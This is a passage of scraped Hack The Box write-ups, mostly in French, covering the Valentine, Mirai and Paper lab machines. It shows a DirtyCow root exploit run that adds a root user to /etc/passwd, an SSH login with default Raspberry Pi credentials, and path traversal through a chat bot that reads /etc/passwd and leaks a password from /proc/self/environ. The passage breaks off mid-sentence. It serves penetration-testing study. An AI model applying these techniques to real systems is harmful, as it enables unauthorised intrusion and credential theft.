https://github.com/FireFart/dirtycow/blob/master/dirty.c\n\u0026lsquo;Generates a new password hash on the fly and modifies /etc/passwd automatically. Just run and pwn.\u0026rsquo;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 hype@Valentine:~$ gcc -pthread diirty.c -o diirty -lcrypt hype@Valentine:~$ chmod +x diirty hype@Valentine:~$ ./diirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash mmap: 7f0df1fda000 madvise 0 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username \u0026#39;firefart\u0026#39; and the password \u0026#39;hello\u0026#39;. DON\u0026#39;T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd Done! Check /etc/passwd to see if the new user was created. You can log in with the username \u0026#39;firefart\u0026#39; and the password \u0026#39;hello\u0026#39;. DON\u0026#39;T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd hype@Valentine:~$ cat /etc/passwd firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash /sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:105:114::/nonexistent:/bin/false avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false saned:x:114:123::/home/saned:/bin/false hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin hype@Valentine:~$ su firefart Password: firefart@Valentine:/home/hype# whoami firefart firefart@Valentine:/home/hype# cat /root/root.txt ced9.....6598 ","date":"2025-02-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/valentine-htb/","title":"HTB | Valentine"},{"content":" Machine name OS IP Difficulty Mirai Linux 10.10.10.48 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ nmap -sC -sV -An -T4 -vvv 10.10.10.48 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAJpzaaGcmwdVrkG//X5kr6m9em2hEu3SianCnerFwTGHgUHrRpR6iocVhd8gN21TPNTwFF47q8nUitupMBnvImwAs8NcjLVclPSdFJSWwTxbaBiXOqyjV5BcKty+s2N8I9neI2coRBtZDUwUiF/1gUAZIimeKOj2x39kcBpcpM6ZAAAAFQDwL9La/FPu1rEutE8yfdIgxTDDNQAAAIBJbfYW/IeOFHPiKBzHWiM8JTjhPCcvjIkNjKMMdS6uo00/JQH4VUUTscc/LTvYmQeLAyc7GYQ/AcLgoYFHm8hDgFVN2D4BQ7yGQT9dU4GAOp4/H1wHPKlAiBuDQMsyEk2s2J+60Rt+hUKCZfnxPOoD9l+VEWfZQYCTOBi3gOAotgAAAIBd6OWkakYL2e132lg6Z02202PIq9zvAx3tfViuU9CGStiIW4eH4qrhSMiUKrhbNeCzvdcw6pRWK41+vDiQrhV12/w6JSowf9KHxvoprAGiEg7GjyvidBr9Mzv1WajlU9BQO0Nc7poV2UzyMwLYLqzdjBJT28WUs3qYTxanaUrV9g== | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpSoRAKB+cPR8bChDdajCIpf4p1zHfZyu2xnIkqRAgm6Dws2zcy+VAZriPDRUrht10GfsBLZtp/1PZpkUd2b1PKvN2YIg4SDtpvTrdwAM2uCgUrZdKRoFa+nd8REgkTg8JRYkSGQ/RxBZzb06JZhRSvLABFve3rEPVdwTf4mzzNuryV4DNctrAojjP4Sq7Msc24poQRG9AkeyS1h4zrZMbB0DQaKoyY3pss5FWJ+qa83XNsqjnKlKhSbjH17pBFhlfo/6bGkIE68vS5CQi9Phygke6/a39EP2pJp6WzT5KI3Yosex3Br85kbh/J8CVf4EDIRs5qismW+AZLeJUJHrj | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCl89gWp+rA+2SLZzt3r7x+9sXFOCy9g3C9Yk1S21hT/VOmlqYys1fbAvqwoVvkpRvHRzbd5CxViOVih0TeW/bM= | 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvYtCvO/UREAhODuSsm7liSb9SZ8gLoZtn7P46SIDZL 53/tcp open domain syn-ack ttl 63 dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http syn-ack ttl 63 lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Site doesn\u0026#39;t have a title (text/html; charset=UTF-8). | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST gobuster : Website port 80 On trouve notamment un dossier .git\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ┌──(kali㉿kali)-[~/htb/Mirai/pi_git_repo] └─$ gobuster dir -u http://10.10.10.48/admin -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.48/admin [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.git/HEAD (Status: 200) [Size: 23] /img (Status: 301) [Size: 0] [--\u0026gt; http://10.10.10.48/admin/img/] /LICENSE (Status: 200) [Size: 14164] /index.php (Status: 200) [Size: 14620] /scripts (Status: 301) [Size: 0] [--\u0026gt; http://10.10.10.48/admin/scripts/] /style (Status: 301) [Size: 0] [--\u0026gt; http://10.10.10.48/admin/style/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== Foothold : Pi Hole Burp On remplace dans la requete HTTP le champs \u0026ldquo;HOST: 10.10.10.48\u0026rdquo; par autre chose par exemple \u0026ldquo;HOST: test\u0026rdquo;. Et là, on observe une réponse avec un code source (alors que de base on avait une réponse sans code source, vide\u0026hellip;).\nDans le code source, on trouve un nom de domaine:\n1 \u0026lt;script src=\u0026#34;http://pi.hole/admin/scripts/vendor/jquery.min.js\u0026#34;\u0026gt; On obtient : pi.hole\nCela suggère :\nUn filtrage basé sur l’en-tête Host (pratique courante avec des reverse proxies ou des DNS internes). Le serveur attend des requêtes destinées à un domaine spécifique, probablement configuré localement. dig On sait qu\u0026rsquo;il y a un dns sur ce serveur (port 53). Donc, d\u0026rsquo;après ippsec (et oui j\u0026rsquo;ai pas trouvé ça tt seul\u0026hellip;), on peut faire :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~/htb/Mirai/pi-hole-3.1.4] └─$ dig @10.10.10.48 pi.hole ; \u0026lt;\u0026lt;\u0026gt;\u0026gt; DiG 9.20.3-1-Debian \u0026lt;\u0026lt;\u0026gt;\u0026gt; @10.10.10.48 pi.hole ; (1 server found) ;; global options: +cmd ;; Got answer: ;; -\u0026gt;\u0026gt;HEADER\u0026lt;\u0026lt;- opcode: QUERY, status: NOERROR, id: 32672 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;pi.hole. IN A ;; ANSWER SECTION: pi.hole. 300 IN A 192.168.204.129 ;; Query time: 20 msec ;; SERVER: 10.10.10.48#53(10.10.10.48) (UDP) ;; WHEN: Wed Feb 05 17:08:46 EST 2025 ;; MSG SIZE rcvd: 52 SSH Default Credentials - Raspberry PI Après la découverte de pi hole, il en déduire que la machine est un raspberry pi. Or, les credentials SSH par défaut sur un raspberry sont: pi:rasberry\n1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(kali㉿kali)-[~/htb/Mirai/pi-hole-3.1.4] └─$ ssh pi@10.10.10.48 The authenticity of host \u0026#39;10.10.10.48 (10.10.10.48)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:TL7joF/Kz3rDLVFgQ1qkyXTnVQBTYrV44Y2oXyjOa60. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;10.10.10.48\u0026#39; (ED25519) to the list of known hosts. pi@10.10.10.48\u0026#39;s password: raspberry pi@raspberrypi:~ $ cat Desktop/user.txt ff83.....838d pi@raspberrypi:~ $ Fake root flag 1 2 3 4 5 6 7 8 9 10 pi@raspberrypi:~/python_games $ sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL pi@raspberrypi:~/python_games $ sudo su root@raspberrypi:/home/pi/python_games# cat /root/root.txt I lost my original root.txt! I think I may have a backup on my USB stick... Restoring Root flag usbstick 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 root@raspberrypi:/media# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda 8:0 0 10G 0 disk ├─sda1 8:1 0 1.3G 0 part /lib/live/mount/persistence/sda1 └─sda2 8:2 0 8.7G 0 part /lib/live/mount/persistence/sda2 sdb 8:16 0 10M 0 disk /media/usbstick sr0 11:0 1 1024M 0 rom loop0 7:0 0 1.2G 1 loop /lib/live/mount/rootfs/filesystem.squashfs root@raspberrypi:/media/usbstick# cat damnit.txt lost+found/ root@raspberrypi:/media/usbstick# cat damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ------------------------------------------------------- ## On aurait aussi pu faire : root@raspberrypi:~# df -lh Filesystem Size Used Avail Use% Mounted on aufs 8.5G 2.8G 5.3G 35% / tmpfs 100M 13M 88M 13% /run /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs ... /dev/sdb 8.7M 93K 7.9M 2% /media/usbstick tmpfs 50M 0 50M 0% /run/user/999 tmpfs 50M 0 50M 0% /run/user/1000 root@raspberrypi:~# mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755) ... ... /dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered) ... Creating image of the usb key 1 2 3 4 root@raspberrypi:~# dd if=/dev/sdb of=/root/usbstick.img bs=4M 2+1 records in 2+1 records out 10485760 bytes (10 MB) copied, 0.0202228 s, 519 MB/s forensics on the img En utilisant la commande strings (meme pas besoin de autopsy\u0026hellip;) on trouve rapidement le flag dans l\u0026rsquo;image de la clé usb.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 root@raspberrypi:~# strings usbstick.img \u0026gt;r \u0026amp; /media/usbstick lost+found root.txt damnit.txt \u0026gt;r \u0026amp; \u0026gt;r \u0026amp; /media/usbstick lost+found root.txt damnit.txt \u0026gt;r \u0026amp; /media/usbstick 2]8^ lost+found root.txt damnit.txt \u0026gt;r \u0026amp; 3d3e.....020b \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; HERE IT IS Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James BONUS On pouvait faire un string directement sur le volume de la clé usb\u0026hellip; ca marche aussi !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 root@raspberrypi:~# strings /dev/sdb \u0026gt;r \u0026amp; /media/usbstick lost+found root.txt damnit.txt \u0026gt;r \u0026amp; \u0026gt;r \u0026amp; /media/usbstick lost+found root.txt damnit.txt \u0026gt;r \u0026amp; /media/usbstick 2]8^ lost+found root.txt damnit.txt \u0026gt;r \u0026amp; 3d3e.....020b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ","date":"2025-02-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/mirai-htb/","title":"HTB | Mirai"},{"content":" Machine name OS IP Difficulty Paper Linux 10.10.11.143 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.143 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 06:38 EST ... ... Nmap scan report for 10.10.11.143 Host is up, received echo-reply ttl 63 (0.018s latency). Scanned at 2025-01-24 06:38:11 EST for 35s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcZzzauRoUMdyj6UcbrSejflBMRBeAdjYb2Fkpkn55uduA3qShJ5SP33uotPwllc3wESbYzlB9bGJVjeGA2l+G99r24cqvAsqBl0bLStal3RiXtjI/ws1E3bHW1+U35bzlInU7AVC9HUW6IbAq+VNlbXLrzBCbIO+l3281i3Q4Y2pzpHm5OlM2mZQ8EGMrWxD4dPFFK0D4jCAKUMMcoro3Z/U7Wpdy+xmDfui3iu9UqAxlu4XcdYJr7Iijfkl62jTNFiltbym1AxcIpgyS2QX1xjFlXId7UrJOJo3c7a0F+B3XaBK5iQjpUfPmh7RLlt6CZklzBZ8wsmHakWpysfXN | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE/Xwcq0Gc4YEeRtN3QLduvk/5lezmamLm9PNgrhWDyNfPwAXpHiu7H9urKOhtw9SghxtMM2vMIQAUh/RFYgrxg= | 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdmmhk1vKOrAmcXMPh0XRA5zbzUHt1JBbbWwQpI4pEX 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) | http-methods: | Supported Methods: POST OPTIONS HEAD GET TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 |_http-title: HTTP Server Test Page powered by CentOS 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) | tls-alpn: |_ http/1.1 |_http-title: HTTP Server Test Page powered by CentOS |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain | Subject Alternative Name: DNS:localhost.localdomain | Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain/organizationalUnitName=ca-3899279223185377061 | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-07-03T08:52:34 | Not valid after: 2022-07-08T10:32:34 | MD5: 579a:92bd:803c:ac47:d49c:5add:e44e:4f84 | SHA-1: 61a2:301f:9e5c:2603:a643:00b5:e5da:5fd5:c175:f3a9 | -----BEGIN CERTIFICATE----- | MIIE4DCCAsigAwIBAgIIdryw6eirdUUwDQYJKoZIhvcNAQELBQAwgY8xCzAJBgNV | BAYTAlVTMRQwEgYDVQQKDAtVbnNwZWNpZmllZDEfMB0GA1UECwwWY2EtMzg5OTI3 | mh/ptg== |_-----END CERTIFICATE----- | http-methods: | Supported Methods: POST OPTIONS HEAD GET TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 |_ssl-date: TLS randomness does not represent time Foothold office.paper En utilisant burp, on observe une réponse HTTP avec le header \u0026ldquo;Backend-server: office.paper\u0026rdquo;. En l\u0026rsquo;ajoutant a /etc/hosts, on accède à une nouvelle page web.\ndirsearch 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 gobuster dir -u http://office.paper -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://office.paper [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 199] /.htpasswd (Status: 403) [Size: 199] /.hta (Status: 403) [Size: 199] /cgi-bin/ (Status: 403) [Size: 199] /manual (Status: 301) [Size: 235] [--\u0026gt; http://office.paper/manual/] /index.php (Status: 301) [Size: 1] [--\u0026gt; http://office.paper/] /wp-admin (Status: 301) [Size: 237] [--\u0026gt; http://office.paper/wp-admin/] /wp-content (Status: 301) [Size: 239] [--\u0026gt; http://office.paper/wp-content/] /wp-includes (Status: 301) [Size: 240] [--\u0026gt; http://office.paper/wp-includes/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== wordpress On observe avec dirsearch une page de login wordpress \u0026ndash;\u0026gt; /wp-admin\nwp-scan On observe : WordPress version 5.2.3 identified (Insecure, released on 2019-09-04).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 $ wpscan --url http://office.paper _______________________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ® \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | \u0026#39;_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://office.paper/ [10.10.11.143] [+] Started: Thu Jan 30 10:22:59 2025 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 | - X-Powered-By: PHP/7.2.24 | - X-Backend-Server: office.paper | Found By: Headers (Passive Detection) | Confidence: 100% [+] WordPress readme found: http://office.paper/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-04). | Found By: Rss Generator (Passive Detection) | - http://office.paper/index.php/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=5.2.3\u0026lt;/generator\u0026gt; | - http://office.paper/index.php/comments/feed/, \u0026lt;generator\u0026gt;https://wordpress.org/?v=5.2.3\u0026lt;/generator\u0026gt; [+] WordPress theme in use: construction-techup | Location: http://office.paper/wp-content/themes/construction-techup/ | Last Updated: 2022-09-22T00:00:00.000Z | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt | [!] The version is out of date, the latest version is 1.5 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1 | Style Name: Construction Techup | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a... | Author: wptexture | Author URI: https://testerwp.com/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: \u0026#39;Version: 1.1\u0026#39; [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 \u0026lt;====================================================================================================================================================\u0026gt; (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Thu Jan 30 10:23:06 2025 [+] Requests Done: 169 [+] Cached Requests: 5 [+] Data Sent: 42.416 KB [+] Data Received: 167.972 KB [+] Memory used: 280.184 MB [+] Elapsed time: 00:00:07 Viewing unauthenticated posts.md http://office.paper/?static=1\u0026order=desc\nPermet d\u0026rsquo;afficher des messages cachés normalement non accessible. C\u0026rsquo;est une vulnerabilité de wordpress 5.2.3 :\nVuln: Wordpress \u0026lt;=5.2.3: viewing unauthenticated posts.md\nOn trouve le message suivant qui semble intéressant :\n1 2 ## Secret Registration URL of new Employee chat system http://chat.office.paper/register/8qozr226AhkCHZdyY On arrive sur une page, où l\u0026rsquo;on peut créer un compte rapidement et on obtient l\u0026rsquo;accès à une sorte de discord avec un chat: L\u0026rsquo;application RocketChat.\nRocketChat bot En fouillant on voit qu\u0026rsquo;il existe un profil avec un bot, on peut discuter avec lui. Avec la commande help on voit une commande qui permet d\u0026rsquo;afficher des fichiers. Cette commande fait appelle à cat pour afficher n\u0026rsquo;importe quel fichier. On peut utiliser cette commande comme une LFI pour afficher le contenu de n\u0026rsquo;importe quel fichier :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 recyclops file test.txt cat: /home/dwight/sales/test.txt: No such file or directory recyclops file ../../../etc/passwd \u0026lt;!=====Contents of file ../../../etc/passwd=====\u0026gt; root❌0:0:root:/root:/bin/bash bin❌1:1:bin:/bin:/sbin/nologin daemon❌2:2:daemon:/sbin:/sbin/nologin adm❌3:4:adm:/var/adm:/sbin/nologin lp❌4:7:lp:/var/spool/lpd:/sbin/nologin sync❌5:0:sync:/sbin:/bin/sync shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt mail❌8:12:mail:/var/spool/mail:/sbin/nologin operator❌11:0:operator:/root:/sbin/nologin games❌12💯games:/usr/games:/sbin/nologin ftp❌14:50:FTP User:/var/ftp:/sbin/nologin nobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin dbus❌81:81:System message bus:/:/sbin/nologin systemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin systemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin polkitd❌998:996:User for polkitd:/:/sbin/nologin geoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin qemu❌107:107:qemu user:/:/sbin/nologin apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin cockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin pulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin usbmuxd❌113:113:usbmuxd user:/:/sbin/nologin unbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin gluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin chrony❌993:987::/var/lib/chrony:/sbin/nologin libstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin saslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin dnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin radvd❌75:75:radvd user:/:/sbin/nologin clevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin pegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin sssd❌983:981:User for sssd:/:/sbin/nologin colord❌982:980:User for colord:/var/lib/colord:/sbin/nologin rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin setroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin pipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin gdm❌42:42::/var/lib/gdm:/sbin/nologin gnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin insights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin tcpdump❌72:72::/:/sbin/nologin mysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin nginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin mongod❌976:974:mongod:/var/lib/mongo:/bin/false rocketchat❌1001:1001::/home/rocketchat:/bin/bash dwight❌1004:1004::/home/dwight:/bin/bash \u0026lt;!=====End of file ../../../etc/passwd=====\u0026gt; /proc/self/environ: Environment variables On peut afficher les variables d\u0026rsquo;environnements (et d\u0026rsquo;autres infos) grâce aux fichiers présents dans /proc/self :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 recyclops file ../../../proc/self/cmdline ################################################# Bot 7:05 PM \u0026lt;!=====Contents of file ../../../proc/self/cmdline=====\u0026gt; cat/home/dwight/sales/../../../proc/self/cmdline \u0026lt;!=====End of file ../../../proc/self/cmdline=====\u0026gt; recyclops file ../../../proc/self/environ ################################################# Bot 7:07 PM \u0026lt;!=====Contents of file ../../../proc/self/environ=====\u0026gt; RESPOND_TO_EDITED=trueROCKETCHAT_USER=recyclopsLANG=en_US.UTF-8OLDPWD=/home/dwight/hubotROCKETCHAT_URL=http://127.0.0.1:48320ROCKETCHAT_USESSL=falseXDG_SESSION_ID=1USER=dwightRESPOND_TO_DM=truePWD=/home/dwight/hubotHOME=/home/dwightPORT=8000ROCKETCHAT_PASSWORD=Queenofblad3s!23SHELL=/bin/shSHLVL=4BIND_ADDRESS=127.0.0.1LOGNAME=dwightDBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1004/busXDG_RUNTIME_DIR=/run/user/1004PATH=/home/dwight/hubot/node_modules/coffeescript/bin:node_modules/.bin:node_modules/hubot/node_modules/.bin:/usr/bin:/bin_=/usr/bin/cat \u0026lt;!=====End of file ../../../proc/self/environ=====\u0026gt; On obtient les creds de rocketchat sur la plateforme rocket.chat rocketchat : Queenofblad3s!23\nAprès vérification, on ne peut pas se connecter en ssh avec cet utilisateur et ce mot de passe. Les creds marchent sur la plateforme web mais un message nous indique qu\u0026rsquo;il est interdit de se connecter à l\u0026rsquo;interface web avec un bot.\nSSH : dwight Le mot de 